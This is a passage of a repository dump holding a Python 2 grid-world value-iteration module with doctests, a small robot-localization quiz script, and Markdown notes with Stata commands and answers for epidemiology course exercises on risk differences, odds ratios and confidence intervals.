'c2' notation instead of x, y coordinates.\r\nROW_LETTERS=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n\r\n\r\ndef letterToIndex(x):\r\n\t\"\"\" Converts the lowercase row letter to a 0 based index. \r\n\t\t>>> letterToIndex('a')\r\n\t\t0\r\n\t\t>>> letterToIndex('aa')\r\n\t\t52\r\n\t\t>>> letterToIndex('b')\r\n\t\t1\r\n\t\t>>> letterToIndex('bb')\r\n\t\t53\r\n\t\t>>> letterToIndex('A')\r\n\t\t26\r\n\t\"\"\"\r\n\tlen_x = len(x)\r\n\tnum_letters = len(ROW_LETTERS)\r\n\tindex = -1\r\n\tfor i in xrange(num_letters):\r\n\t\tif ROW_LETTERS[i] == x[0]:\r\n\t\t\tindex = i\r\n\t\t\tbreak\r\n\tif index == -1:\r\n\t\traise KeyError(x)\r\n\r\n\treturn (num_letters * (len_x-1) + index)\r\n\r\ndef indexToLetter(x):\r\n\t\"\"\" Converts the zero-based index to a row letter. 
\r\n\t\t>>> indexToLetter(0)\r\n\t\t'a'\r\n\t\t>>> indexToLetter(52)\r\n\t\t'aa'\r\n\t\t>>> indexToLetter(1)\r\n\t\t'b'\r\n\t\t>>> indexToLetter(53)\r\n\t\t'bb'\r\n\t\t>>> indexToLetter(26)\r\n\t\t'A'\r\n\t\"\"\"\r\n\tsize = len(ROW_LETTERS)\r\n\ttimes = x / size + 1\r\n\treturn ROW_LETTERS[x % size] * times\r\n\r\ndef parseKey(key):\r\n\t\"\"\"\r\n\t\tReturns a tuple of two indexes \r\n\t\trepresenting row and column, respectively.\r\n\t\t\r\n\t\tThe key can be a string formated as 'a3'\r\n\t\ta tuple or list, such as (0,1) or [3,3],\r\n\t\tor ('a', 5).\r\n\r\n\t\tThe key can also be a State instance (or\r\n\t\tanything with an 'x' and 'y' attribute.\r\n\r\n\t\tWhen any variant of the alphanumeric\r\n\t\tversion is used, the column value is\r\n\t\tassumed to be indexed from 1.\r\n\r\n\t\t>>> parseKey('a1')\r\n\t\t(0, 0)\r\n\r\n\t\t>>> parseKey(['b', '2'])\r\n\t\t(1, 1)\r\n\r\n\t\t>>> parseKey([3, 6])\r\n\t\t(3, 6)\r\n\r\n\t\t>>> parseKey(['bb', 6])\r\n\t\t(53, 5)\r\n\r\n\t\t>>> parseKey(State(0,1))\r\n\t\ta2\r\n\r\n\t\t>>> parseKey(State('b',1))\r\n\t\tb1\r\n\r\n\t\t>>> parseKey(State('b1'))\r\n\t\tb1\r\n\t\"\"\"\r\n\tif isinstance(key, State):\r\n\t\treturn key\r\n\tif isinstance(key, (basestring, str)):\r\n\t\tx = letterToIndex(key[0:1])\r\n\t\ty = int(key[1:])-1\r\n\telif len(key) == 2:\r\n\t\tx, y = key\r\n\t\tif isinstance(x, (basestring, str)):\r\n\t\t\tx = letterToIndex(x)\r\n\t\t\ty = int(y) - 1\r\n\telse:\r\n\t\traise TypeError\r\n\r\n\treturn x, y\r\n\r\n\r\nclass StochasticAction(object):\r\n\tdef __init__(self, symbol, outcomes):\r\n\t\tself._outcomes = outcomes\r\n\t\tself.action = outcomes[0][0]\r\n\t\tself.symbol = symbol\r\n\r\n\tdef __str__(self):\r\n\t\treturn self.symbol\r\n\r\n\tdef __repr__(self):\r\n\t\treturn 'StochasticAction('+repr(self.symbol)+','+repr(self._outcomes)+')'\r\n\t\r\n\tdef move(self, world, state):\r\n\t\treturn self.action.move(world, state)\r\n\r\n\tdef outcomes(self, world, state):\r\n\t\treturn self.combine_outcomes( 
[Outcome(a.move(world, state), p) \r\n\t\t\tfor (a, p) in self._outcomes])\r\n\r\n\tdef combine_outcomes(self, uncombined):\r\n\t\t# split the outcomes into buckets based on the state of the outcome;\r\n\t\t# outcomes with the same state can then be combined\r\n\t\tstateMap = dict()\r\n\t\tfor o in uncombined:\r\n\t\t\ts = str(o.state)\r\n\t\t\tif s in stateMap:\r\n\t\t\t\tstateMap[s].append(o)\r\n\t\t\telse:\r\n\t\t\t\tstateMap[s] = [o]\r\n\r\n\t\tresult = []\r\n\t\tfor outcomes in stateMap.values():\r\n\t\t\to = outcomes[0]\r\n\t\t\tfor i in xrange(1,len(outcomes)):\r\n\t\t\t\to = (o + outcomes[i])\r\n\t\t\tresult.append(o)\r\n\r\n\t\treturn result\r\n\r\nclass Action(object):\r\n\tdef __init__(self, symbol, xStep=0, yStep=0):\r\n\t\tself.xStep = xStep\r\n\t\tself.yStep = yStep\r\n\t\tself.symbol = symbol\r\n\t\r\n\tdef __str__(self):\r\n\t\treturn self.symbol\r\n\r\n\tdef __repr__(self):\r\n\t\treturn 'Action('+repr(self.symbol)+','+repr(self.xStep)+','+repr(self.yStep)+')'\r\n\r\n\tdef outcomes(self, world, state):\r\n\t\treturn [Outcome(self.move(world, state), 1.0)]\r\n\t\r\n\tdef move(self, world, state):\r\n\t\tnewState = (state.x + self.xStep), (state.y + self.yStep)\r\n\t\tif newState in world and not world.isImpasse(newState):\r\n\t\t\treturn world.state(newState)\r\n\t\telse:\r\n\t\t\treturn state\r\n\r\nclass Outcome(object):\r\n\t\"\"\" An outcome for a particular action. The resultant \r\n\t\tstate and probability are contained here. 
\"\"\"\r\n\tdef __init__(self, state, probability):\r\n\t\tself.state = state\r\n\t\tself.p = probability\r\n\t\r\n\tdef combinesWith(self, other):\r\n\t\treturn self.state == other.state\r\n\r\n\tdef combine(self, other):\r\n\t\tassert self.combinesWith(other)\r\n\r\n\t\treturn Outcome(self.state, self.p + other.p)\r\n\r\n\tdef __add__(self, other):\r\n\t\treturn self.combine(other)\r\n\r\n\tdef __repr__(self):\r\n\t\treturn \"Outcome[\"+str(self.state)+\", probability=\"+str(self.p)+\"]\"\r\n\r\nclass AbsorbingValue(object):\r\n\tdef __init__(self,value):\r\n\t\tself.value = value\r\n\tdef __str__(self):\r\n\t\treturn'%+d' % self.value\r\n\tdef __repr__(self):\r\n\t\t'AbsorbingValue('+repr(self.value)+')'\r\n\r\nclass Obstacle(object):\r\n\tdef __init__(self,symbol):\r\n\t\tself.symbol = symbol\r\n\tdef __repr__(self):\r\n\t\treturn 'Obstacle('+repr(self.symbol)+')'\r\n\tdef __str__(self):\r\n\t\treturn str(self.symbol)\r\n\r\nclass State(object):\r\n\t\"\"\" A location in the Grid World. 
It should be immutable (x and y not changed).\r\n\t\tIt's value can change, but that state is owned by the World object, not the \r\n\t\tState.\r\n\t\"\"\"\r\n\tdef __init__(self, x, y=None):\r\n\r\n\t\tif y is None:\r\n\t\t\tself.x, self.y = parseKey(x)\r\n\t\telse:\r\n\t\t\tself.x, self.y = parseKey((x, y))\r\n\r\n\tdef __eq__(self, other):\r\n\t\treturn isinstance(other, State) \\\r\n\t\t\t\tand self.x == other.x \\\r\n\t\t\t\tand self.y == other.y\r\n\r\n\tdef __hash__(self):\r\n\t\treturn 13*hash(self.x) + 17*hash(self.y)\r\n\r\n\tdef __repr__(self):\r\n\t\treturn indexToLetter(self.x) + str(self.y+1) \r\n\r\n\tdef __len__(self):\r\n\t\t\"\"\" The number of coordinates - always 2 (row and column) \"\"\"\r\n\t\treturn 2\r\n\r\n\tdef __getitem__(self, key):\r\n\t\t\"\"\" You can access the row index using self[0] notation \r\n\t\t\tand the column with self[1] \"\"\"\r\n\t\tif key == 0:\r\n\t\t\treturn self.x\r\n\t\telif key == 1:\r\n\t\t\treturn self.y\r\n\t\telse:\r\n\t\t\traise IndexError\r\n\r\nGOAL = AbsorbingValue(100)\r\nTRAP = AbsorbingValue(-100)\r\nBLOCK = Obstacle('[___]')\r\n\r\nclass World(object):\r\n\t\"\"\" A simple Grid world \"\"\"\r\n\r\n\tN = Action('N', -1, 0)\r\n\tS = Action('S', 1, 0)\r\n\tE = Action('E', 0, 1)\r\n\tW = Action('W', 0, -1)\r\n\r\n\tNE = Action('NE', -1, 1)\r\n\tNW = Action('NW', -1, -1)\r\n\tSE = Action('SE', 1, 1)\r\n\tSW = Action('SE', 1, -1)\r\n\r\n\tNORTH = StochasticAction('N*', [ (N, .8), (E, .1), (W, .1)])\r\n\tSOUTH = StochasticAction('S*', [ (S, .8), (E, .1), (W, .1) ])\r\n\tEAST = StochasticAction('E*', [ (E, .8), (N, .1), (S, .1) ])\r\n\tWEST = StochasticAction('W*', [ (W, .8), (N, .1), (S, .1) ])\r\n\r\n\t# Example of using non-cardinal directions:\r\n\t# NORTH = StochasticAction('NORTH', [ (N, .6), (E, .1), (W, .1), (NE, .1), (NW, .1) ])\r\n\r\n\tdef __init__(self,numRows=3, numCols=4, colWidth=7,numFmt='%.0f', actions=None, motionCost=-3,defaultValues=None):\r\n\t\tself.w = [[0]*numCols for i in 
xrange(numRows)]\r\n\t\tself.numCols = numCols\r\n\t\tself.numRows = numRows\r\n\t\tself.colWidth = colWidth\r\n\t\tself.numFmt = numFmt\r\n\t\tself.actions = actions \\\r\n\t\t\t\tif actions is not None \\\r\n\t\t\t\telse [World.NORTH, World.SOUTH, World.EAST, World.WEST]\r\n\t\tself.motionCost = motionCost\r\n\r\n\t\tif defaultValues:\r\n\t\t\tfor key, value in defaultValues:\r\n\t\t\t\tself[key] = value\r\n\r\n\tdef __repr__(self):\r\n\t\treturn '<' + repr(self.w) + '>'\r\n\r\n\tdef __str__(self):\r\n\t\tdef formatValue(value, x, y):\r\n\t\t\tif isinstance(value, (Obstacle, AbsorbingValue)):\r\n\t\t\t\tv = str(value)\r\n\t\t\telse:\r\n\t\t\t\tv = (self.numFmt % value)\r\n\t\t\treturn v\r\n\r\n\t\treturn self.formatGrid(formatValue)\r\n\r\n\tdef formatGrid(self,formatValue):\r\n\t\tcolWidth = self.colWidth\r\n\t\tnumCols = self.numCols\r\n\t\tnumRows = self.numRows\r\n\t\tnumFmt = self.numFmt\r\n\t\tw = self.w\r\n\t\tcolfmt = '{0:^' + str(colWidth) + 's}'\r\n\r\n\t\tbuf = []\r\n\t\tbuf.append(colfmt.format(''))\r\n\r\n\t\t# column numbers\r\n\t\tfor i in xrange(numCols):\r\n\t\t\tbuf.append(colfmt.format(str(i+1)))\r\n\t\tbuf.append('\\n')\r\n\r\n\t\tbuf.append('-' * ((numCols+1)*colWidth))\r\n\t\tbuf.append('\\n')\r\n\r\n\t\tfor j in xrange(numRows):\r\n\t\t\t# row number\r\n\t\t\tbuf.append(colfmt.format(str(indexToLetter(j)+' |')))\r\n\t\t\tr = w[j]\r\n\r\n\t\t\t# column values\r\n\t\t\tfor i in xrange(numCols):\r\n\t\t\t\tbuf.append( colfmt.format( formatValue(r[i], j, i) ) )\r\n\t\t\tbuf.append('\\n')\r\n\r\n\t\treturn ''.join(buf)\r\n\r\n\tdef state(self, x, y = None):\r\n\t\tif y is None:\r\n\t\t\tif isinstance(x, State):\r\n\t\t\t\treturn x\r\n\t\t\tnewX, newY = parseKey(x)\r\n\t\t\treturn State(newX, newY)\r\n\t\telse:\r\n\t\t\treturn State(x, y)\r\n\r\n\tdef __getitem__(self, key):\r\n\t\tx, y = parseKey(key)\r\n\t\treturn self.w[x][y]\r\n\r\n\tdef __setitem__(self, key, value):\r\n\t\tx, y = parseKey(key)\r\n\t\tself.w[x][y] = (value)\r\n\t\r\n\tdef 
__contains__(self, key):\r\n\t\tx, y = parseKey(key)\r\n\t\treturn (x >= 0 and x < self.numRows) \\\r\n\t\t\t\tand (y >= 0 and y < self.numCols)\r\n\t\r\n\tdef isAbsorbing(self, key):\r\n\t\treturn isinstance(self[key], AbsorbingValue)\r\n\r\n\tdef isImpasse(self, key):\r\n\t\treturn isinstance(self[key], Obstacle)\r\n\r\n\tdef value(self, key):\r\n\t\tv = self[key]\r\n\t\tif isinstance(v, AbsorbingValue):\r\n\t\t\treturn v.value\r\n\t\treturn v\r\n\r\n\tdef V(self, state, gamma=1.0):\r\n\t\treturn max([ (gamma * sum( ( o.p * self.value(o.state) ) \r\n\t\t\tfor o in a.outcomes(self, state)) ) \r\n\t\t\tfor a in self.actions]) + self.R(state)\t\r\n\r\n\tdef R(self, state):\r\n\t\tif self.isAbsorbing(state):\r\n\t\t\treturn self[state].value\r\n\t\treturn self.motionCost\r\n\r\n\tdef possible_moves(self, state):\r\n\t\tworld = self\r\n\t\tactions = world.actions\r\n\t\treturn [s for s in [a.move(world, state) for a in actions] if s != state]\r\n\r\n\tdef action_values(self, state):\r\n\t\tassert not self.isAbsorbing(state) \\\r\n\t\t\t\tand not self.isImpasse(state), \\\r\n\t\t\t\t'state is absorbing or impasse: ' + str(state)\r\n\t\treturn [(a, sum( [o.p * self.value(o.state) for o in a.outcomes(self,state)])) for a in self.actions]\r\n\r\n\tdef best_action(self, state):\r\n\t\tbest_action = None\r\n\t\tbest_value = None\r\n\t\tfor action, value in self.action_values(state):\r\n\t\t\tif best_action is None or value > best_value:\r\n\t\t\t\tbest_action, best_value = action, value\r\n\t\treturn (best_action, best_value)\r\n\r\n\tdef print_policy(self):\r\n\t\tdef formatValue(value, i, j):\r\n\t\t\tif isinstance(value, (Obstacle, AbsorbingValue)):\r\n\t\t\t\tv = str(value)\r\n\t\t\telse:\r\n\t\t\t\tv = str(self.best_action(State(i,j))[0])\r\n\t\t\treturn v\r\n\r\n\r\n\t\tprint self.formatGrid(formatValue)\r\n\r\n\r\n\tdef states_reachable_from(self,initial):\r\n\t\t\"\"\"Returns all of the states reachable from initial in the \r\n\t\t\tworld (using tree-search 
algorithm / breadth-first)\"\"\"\r\n\r\n\t\tassert not (self.isImpasse(initial) or self.isAbsorbing(initial)), \\\r\n\t\t\t\t'initial state is not occupyable: ' + initial\r\n\r\n\t\tfrontier = []\r\n\t\texplored = []\r\n\t\tfrontier.append(self.state(initial))\r\n\t\t\r\n\t\twhile frontier:\r\n\t\t\ts = self.state(frontier.pop(0))\r\n\t\t\tfor f in self.possible_moves(s):\r\n\t\t\t\tif not self.isAbsorbing(f) \\\r\n\t\t\t\t\t\tand f not in explored \\\r\n\t\t\t\t\t\tand f not in frontier:\r\n\t\t\t\t\tfrontier.append(f)\r\n\t\t\texplored.append(s)\r\n\t\treturn explored\r\n\t\r\n\tdef value_iter(self, initial, delta = 0):\r\n\t\t\"\"\" Performs the value iteration routine until convergence.\r\n\t\t\tThe delta parameter controls how little difference implies convergence\r\n\t\t\t(the default value is 0).\r\n\r\n\t\t\tThe initial parameter is the starting position (should be next to the goal)\r\n\t\t\"\"\"\r\n\t\tstates = self.states_reachable_from(initial)\r\n\r\n\t\titerations = 0\r\n\t\twhile True:\r\n\t\t\titerations += 1\r\n\t\t\tlast_val = self[initial]\r\n\t\t\tfor s in states:\r\n\t\t\t\tself[s] = self.V(s)\r\n\t\t\tif abs(self[initial] - last_val) <= delta:\r\n\t\t\t\tbreak # converged\r\n\t\treturn iterations\r\n\r\n\tdef randomize(world, p_goal=.01, p_pit=.01, p_block=.01):\r\n\t\t\"\"\" Randomize the world using the probabilities. 
\"\"\"\r\n\t\trows = world.numRows\r\n\t\tcols = world.numCols\r\n\r\n\t\ta = p_goal\r\n\t\tb = p_goal + p_pit\r\n\t\tc = p_goal + p_pit + p_block\r\n\r\n\t\tfor x in xrange(rows):\r\n\t\t\tfor y in xrange(cols):\r\n\t\t\t\tn = random.random()\r\n\t\t\t\ts = (x, y)\r\n\t\t\t\tif n >= 0 and n < a:\r\n\t\t\t\t\tworld[s] = GOAL \r\n\t\t\t\telif n >= a and n < b:\r\n\t\t\t\t\tworld[s] = TRAP \r\n\t\t\t\telif n >= b and n < c:\r\n\t\t\t\t\tworld[s] = BLOCK\r\n\t\t\t\telse:\r\n\t\t\t\t\tworld[s] = 0\r\n\r\n\tdef set_range(self, val, row_range, col_range):\r\n\t\t\"\"\" Make each (i,j) where i is in row_range and j is in col_range equal to val.\r\n\t\t\tFor example, set_range(BLOCK,xrange(0,5), xrange(3,6)) would make the squares\r\n\t\t\tin the ranges BLOCKs).\r\n\t\t\"\"\"\r\n\t\tfor i in row_range:\r\n\t\t\tfor j in col_range:\r\n\t\t\t\tself[(i,j)] = val\r\n\r\ndef grid_world():\r\n\t\"\"\" The Grid World from the video lectures:\r\n\t\t\r\n>>> w = grid_world()\r\n>>> w.value_iter('a3')\r\n28\r\n>>> print w\r\n 1 2 3 4 \r\n-----------------------------------\r\n a | 85 89 93 +100 \r\n b | 81 [___] 68 -100 \r\n c | 77 73 70 47 \r\n<BLANKLINE>\r\n\"\"\"\r\n\treturn World(numRows=3, numCols=4,\r\n\t\t\tdefaultValues=[('b2',BLOCK),('a4',GOAL),('b4',TRAP)])\r\n\r\n\r\n\r\ndef crazyWorld(rows=26, cols=26):\r\n\tworld = World(rows, cols)\r\n\tworld.randomize()\r\n\treturn world\r\n\r\ndef testIt():\r\n\tworld = grid_world()\r\n\tprint world\r\n\r\n\tc1 = world.state(2,0)\r\n\tprint c1\r\n\tprint World.NORTH.outcomes(world, c1)\r\n\r\n\tb3 = world.state(1,2)\r\n\tprint b3\r\n\tprint World.WEST.outcomes(world, b3)\r\n\r\n\ta3 = world.state('a3')\r\n\tprint \"a3 = \" + str(a3)\r\n\tprint \"outcomes for E from a3: \" + str(World.EAST.outcomes(world, a3))\r\n\tprint \"V(a3) = \" + str(world.V(a3))\r\n\tprint world\r\n\r\n\tworld[a3] = world.V(a3)\r\n\tprint world\r\n\r\n\tb3 = world.state('b',3)\r\n\tprint \"V(\" + str(b3) + \") = \" + str(world.V(b3))\r\n\r\n\tworld[b3] = 
world.V(b3)\r\n\tprint world\r\n\r\n\tprint \"Value iteration until convergence ...\"\r\n\tworld = grid_world()\r\n\titerations = world.value_iter('a3')\r\n\tprint \"Converged in {0} iterations\".format(iterations)\r\n\tprint world\r\n\r\n\tN1 = StochasticAction('N', [ (World.N, .8), (World.S, .2) ])\r\n\tS1 = StochasticAction('S', [ (World.S, .8), (World.N, .2) ])\r\n\tE1 = StochasticAction('E', [ (World.E, .8), (World.W, .2) ])\r\n\tW1 = StochasticAction('W', [ (World.W, .8), (World.E, .2) ])\r\n\r\n\tw = World(numRows=2,numCols=4,actions=[N1,S1,E1,W1],motionCost=-4,defaultValues=[('b4',GOAL),('b1',TRAP)])\r\n\tw.value_iter('a4')\r\n\tprint w\r\n\tw.print_policy()\t\r\n\r\nimport doctest\r\ndoctest.testmod()\r\n\r\n" }, { "alpha_fraction": 0.6977491974830627, "alphanum_fraction": 0.7170417904853821, "avg_line_length": 22.769229888916016, "blob_id": "d492057bdd5badcfe8c77313ae107022b6f8fb74", "content_id": "45c57f24713d7b4d475b8ee962b19e1d99ae25b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "no_license", "max_line_length": 106, "num_lines": 13, "path": "/CS373/Unit-1/unit-1_5.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Uniform-Probability-Quiz \n# Robot Localization\n\n# We have 5 different cells where each cell has the same probability that the robot might be in that cell.\n# So probabilities add up to 1\n# Quiz from x1 to x5\n# -> What is the probability of any of those x's?\np=[]\nn=5\nfor i in range(n):\n\tp.append(1)\n\nprint p\n\n\n" }, { "alpha_fraction": 0.7094358205795288, "alphanum_fraction": 0.7433848977088928, "avg_line_length": 49.07500076293945, "blob_id": "e8d3e5b29b485b3b8d078bd39ef68cbcdc63d4ef", "content_id": "9bc508d402940fe271b6df40f8dfaa872c8933ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2005, "license_type": "no_license", "max_line_length": 
275, "num_lines": 40, "path": "/PH207x/excercises/Lesson7/Tutorial: Gender and Visiting the Doctor.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Tutorial: Gender and Visiting the Doctor #\n> Rather than examining the health disparities question of the relationship between poverty and doctor visits, let’s switch gears and look at the relationship between gender and visiting the doctor within the past 12 months. Use chis_healthdisparities.dta dataset. \n> \n> To answer these questions, you can use the cs command in Stata. (Note: make sure you don't get the order of the case and exposed variables mixed up if you work from the command-line in Stata). To use the cs command, we need for the exposed variable to be coded as 0 or 1. \n> \n> First, generate an indicator that is equal to 1 if a participant is female and 0 if the participant male. Note that gender is coded as 2 for females, 1 for males. To generate the new indicator, type:\n\n\n\tgen female = gender - 1\n\n\n#### 1. Estimate the risk difference for visiting the doctor in the past 12 months for self-reported female versus male study participants (using the female variable). Calculate risk difference using proportion in females minus proportion in males.####\n> Estimate of risk difference: **0.1888948** \n> \n> 95% Confidence Interval: **[0.1198812,0.2579083]**\n\n> I used:\n\n\tgen female = gender - 1\n\tcs doctor female, or woolf\n\n\n#### 2. Estimate the odds ratio for visiting the doctor in the past 12 months for self-reported female versus male study participants. ####\n> Estimate of odds ratio: **3.517964** \n> \n> 95% Confidence Interval: **[2.174543,5.691343]**\n\n> I used:\n\n\tgen female = gender - 1\n\tcs doctor female, or woolf\n\n\n#### 3. Examine your estimated risk difference and estimated odds ratio, and their respective confidence intervals. 
Do you reach the same conclusion about the association between gender and visiting the doctor using these two measures of association? ####\n> **Yes** \n> No\n\n\n#### 4. If you were writing a paper, would you present the risk difference or the odds ratio (please discuss on the boards below)? ####\n> I would use the risk difference!\n" }, { "alpha_fraction": 0.4899826943874359, "alphanum_fraction": 0.5629482865333557, "avg_line_length": 55.125, "blob_id": "e22722d2a82a16bae07b12be74e370bf1a443d29", "content_id": "9802949022f8a152d35a8b0822668860b64dffdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4053, "license_type": "no_license", "max_line_length": 339, "num_lines": 72, "path": "/PH207x/homework/nine/Obesity and Rate of Stroke.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Obesity and Rate of Stroke ##\n> In the Framingham dataset that can be downloaded from the course website, we would like to examine the association between obesity and the rate of stroke. Since people with hypertension may have a higher body mass index and they are also at greater risk of a stroke, you may be concerned about confounding by hypertension.\n\n#### 1. Use the Framingham dataset and Stata to calculate the incidence rate ratio of stroke comparing obese participants (bmi1>=30) to all other participants. The variable for incident stroke in this dataset is “stroke” and number of years a person was followed for stroke is recorded in the “timestrk” variable in the NHLBI dataset. 
####\n> => **1.79188**\n\n```stata\n\tuse \"framingham_dataset.dta\", clear\n\n\tgen bmi4cat=.\n\treplace bmi4cat=0 if (bmi1<30)\n\treplace bmi4cat=01 if (bmi1>=30)\n\n\tir stroke bmi4cat timestrk\n```\n\n```stata\n | bmi4cat |\n | Exposed Unexposed | Total\n-----------------+------------------------+------------\nIncident Stroke | 85 330 | 415\nTime [years] to | 11144.75 77530.79 | 88675.54\n-----------------+------------------------+------------\n | |\n Incidence rate | .0076269 .0042564 | .00468\n | |\n | Point estimate | [95% Conf. Interval]\n |------------------------+------------------------\n Inc. rate diff. | .0033705 | .0016854 .0050557 \n Inc. rate ratio | 1.79188 | 1.394785 2.280687 (exact)\n Attr. frac. ex. | .441927 | .2830436 .5615356 (exact)\n Attr. frac. pop | .0905152 |\n +-------------------------------------------------\n (midp) Pr(k>=85) = 0.0000 (exact)\n (midp) 2*Pr(k>=85) = 0.0000 (exact)\n```\n\n\n#### 2. Using the Framingham dataset and Stata, what is the incidence rate ratio (round to two decimal points) of stroke among obese participants (bmi1>=30) compared to all other participants after adjusting for prevalent hypertension at visit 1 (prevhyp1)? ####\n> **Hint1:** Are you entering the correct number? You should have two to choose from, one you have already used and the other is the required adjusted value.\n> => **1.197284**\n\n```stata\n\tuse \"framingham_dataset.dta\", clear\n\n\tgen bmi4cat=.\n\treplace bmi4cat=0 if (bmi1<30)\n\treplace bmi4cat=01 if (bmi1>=30)\n\n\tir stroke bmi4cat timestrk, by(prevhyp1)\n```\n\n```stata\nPrevalent hypert | IRR [95% Conf. 
Interval] M-H Weight\n-----------------+-------------------------------------------------\n No | 1.484769 .8687724 2.403521 11.75885 (exact)\n Yes | 1.121565 .8335983 1.493098 44.64521 (exact)\n-----------------+-------------------------------------------------\n Crude | 1.79188 1.394785 2.280687 (exact)\n M-H combined | 1.197284 .939728 1.52543\n-------------------------------------------------------------------\n Test of homogeneity (M-H) chi2(1) = 0.99 Pr>chi2 = 0.3208\n```\n\n\n#### 3. Based on your results above, which option for reporting the association between obesity and stroke is best? ####\n> **Hint1:** In option B you give as an answer the *adjusted measure of association for all*, only one number. In option C, the answer is two different numbers, one for each strata. \n\n* A. The crude incidence rate ratio for the association between obesity and stroke \n* B. The incidence rate ratio for the association between obesity and stroke adjusted for prevalent hypertension using the Mantel-Haenszel formula.\n* C. The incidence rate ratio for the association between obesity and stroke stratified by prevalent hypertension (ie calculate two incidence rate ratios – one among those with prevalent hypertension and one among those without prevalent hypertension). \n* => **B or C**\n\n\n" }, { "alpha_fraction": 0.7788079380989075, "alphanum_fraction": 0.7801324725151062, "avg_line_length": 56.846153259277344, "blob_id": "73c7d2166e464fdebf281d149b3ada511c48b953", "content_id": "caedddfbc7a94ee8902a01b5e19eba4710660636", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 757, "license_type": "no_license", "max_line_length": 339, "num_lines": 13, "path": "/PH207x/exam/exam_part3.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Study Design #\nSelect the most appropriate study design for each of the following questions. 
(Note: All study design options may not be used and each design option can be used more than once.\n\n####1. A study is done to examine the association between a mother’s education and risk of a congenital heart defect in her offspring. The investigator enrolls a group of mothers of babies with birth defects and a group of mothers of babies without birth defects. The mothers are then asked a series of questions about their education.####\n* Case series\n* Case-control study \n* Nested case-control study \n* Prospective cohort study \n* Retrospective cohort study \n* Randomized clinical trial \n* Cross-sectional study \n* Ecological study \n* Case cohort study \n\n\n" }, { "alpha_fraction": 0.6625387072563171, "alphanum_fraction": 0.6983144283294678, "avg_line_length": 58.91752624511719, "blob_id": "82850a21367b06e278e21a2f9f82afd373bea5a5", "content_id": "456ce1ff8a635abe952feaa675ffa4057d62f548", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5814, "license_type": "no_license", "max_line_length": 621, "num_lines": 97, "path": "/PH207x/homework/seven/Inference for proportions.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Inference for proportions #\n> According to Fergusson et al. (2012), acutely ill patients, including neonatal infants, often receive red blood cell transfusions. However, the consequences of the use of red blood cells that have been stored for prolonged periods on health outcomes in premature infants are not well understood. In a double-blinded, randomized controlled trial, the authors looked at health outcomes in neonatal infants who underwent red blood cell transfusions, comparing the standard protocol (transfusions of blood stored for prolonged periods) with fresh blood transfusions (transfusions of blood store for less than seven days). 
\n> \n> The authors examined five outcomes listed below, as well as a composite outcome, defined as at least one of the five outcomes. In this question, we focus primarily on the composite outcome. The results of the study are shown in the following table: \n\nOutcome | Standard Protocol | Fresh Blood\n--------------------------- | ----------------- | ------------\nNecrotizing enterocolitis | 15 | 15\nIntraventricular hemorrhae | 11 | 18\nRetinopathy of prematurity | 26 | 23\nBronchopulmonary dysplasia | 63 | 60\nDeath | 31 | 30\nComposite Outcome | 100 | 99\nTotal Sample Size | 189 | 188\n\n> A dataset hw7.dta is also available on this webpage, which contains individual-level data for the composite outcome and for the group assignment, if you would rather not use the \"immediate\" commands in Stata. \n\n\n#### 1. Construct a 95% confidence interval for the proportion of infants experiencing the composite outcome in the fresh red blood cell group, using the following methods: #### \n> **Hint1:** For lower CI exact and wilson i calculate using the dropdown menu confidence intervals, for upper CI i use the comand cii and i got it right, but i'm really sure that this can't be possible- please explain \n> **Hint2** A lot are having problems with the confidence intervals. When you get one right and the other wrong, it is probably because the values you gave Stata are wrong. There is an error allowance of 2% built in to the answers. So your \"correct\" answer was really wrong, but within 2% of being right. \nUsing cii you should have been correct, if you gave the right sample size and cell size. Looking at help cii: cii #obs #succ [, ciib_options] \nSo you want the number of observations, then the number of \"successes\". In this case success is the number that fall into the desire category of fresh composite. 
\nYou just enter the name of the required confidence interval as an option - don't include the brackets \n> **Hint3:** The question asks you to construct a 95% confidence interval for the proportion of infants experiencing the composite outcome in the group that received fresh red blood cell group. For this reason the variable should be the outcome. You are right, you need put the fresh variable in the by/if/in to be able to pick only the infants who received fresh blood. \n\n> Exact binomial: **[0.4526364,0.5997032]** \n\n> I used:\n\n\tci outcome if fresh==1, binomial\n\n\n> Wilson normal approximation: **[0.455408,0.5967184]**\n\n> I used:\n\n\tci outcome if fresh==1, binomial wilson\n\n#### 2. Is the normal approximation to the binomial appropriate in this setting? ####\n> Yes \n> No\n\n#### 3. Suppose you wanted to calculate a 95% confidence interval for infants experiencing intraventricular hemorrhage after receiving a fresh blood transfusion as well. Examine the table above. Is the Wilson confidence interval still appropriate? #### \n> **Hint1:** One of the answers is above 5 while the other is less than 5. Should we have both of them above 5 to say that Wilson confidence interval still appropriate? I got this answer wrong and really did upset me. *Both needs to be > 5:*\n> **Hint2:** Wilson can be used if np(the mean)>5, and n(1-p)>5. You don't need Stata here. To calculate p you use our formula: P = X(exposed)/N(total sample size) From the table n is known and x is known. \n\n\tcsi #a #b #c #d [, csi_options]\n\n> Yes \n> No\n\n\n#### 4. Estimate and construct a large-sample 95% confidence interval for the risk difference for experiencing the composite outcome for those with fresh blood versus the standard protocol blood. 
